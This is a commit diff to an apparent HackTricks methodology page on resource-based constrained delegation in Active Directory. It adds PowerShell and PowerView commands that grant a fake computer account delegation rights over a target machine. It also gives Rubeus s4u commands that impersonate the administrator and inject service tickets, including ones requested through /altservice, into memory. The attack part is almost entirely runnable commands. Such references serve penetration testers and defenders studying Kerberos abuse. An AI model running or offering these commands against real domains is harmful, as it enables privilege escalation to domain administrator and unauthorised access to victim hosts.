coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] one page modified

Browse Source
This commit is contained in:
CPol 2021-01-04 17:35:09 +00:00 committed by gitbook-bot
parent 251e4c4856
commit 377b9602b3
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 27 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
windows/active-directory-methodology/resource-based-constrained-delegation.md
View File

@ -54,13 +54,32 @@ Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview
### Configuring R**esource-based Constrained Delegation** ### Configuring R**esource-based Constrained Delegation**
**Using activedirectory PowerShell module**
```bash ```bash
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$ #Assing delegation privileges Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$ #Assing delegation privileges
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it work Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
``` ```
![](../../.gitbook/assets/b2.png) ![](../../.gitbook/assets/b2.png)
#### Using powerview
```bash
$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
#Check that it worked
Get-DomainComputer $targetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity'
msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}
```
### Performing a complete S4U attack ### Performing a complete S4U attack
First of all, we created the new Computer object with the password `123456`, so we need the hash of that password: First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
@ -73,7 +92,13 @@ This will print the RC4 and AES hashes for that account.
Now, the attack can be performed: Now, the attack can be performed:
```bash ```bash
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
```
You can generate more tickets just asking once using the `/altservice` param of Rubeus:
```bash
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
``` ```
{% hint style="danger" %} {% hint style="danger" %}
@ -82,12 +107,6 @@ Note that users has an attribute called "**Cannot be delegated**". If a user has
![](../../.gitbook/assets/b3.png) ![](../../.gitbook/assets/b3.png)
You can generate more tickets just asking once using the `/altservice` param of Rubeus:
```bash
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
```
### Accessing ### Accessing
The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**. The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.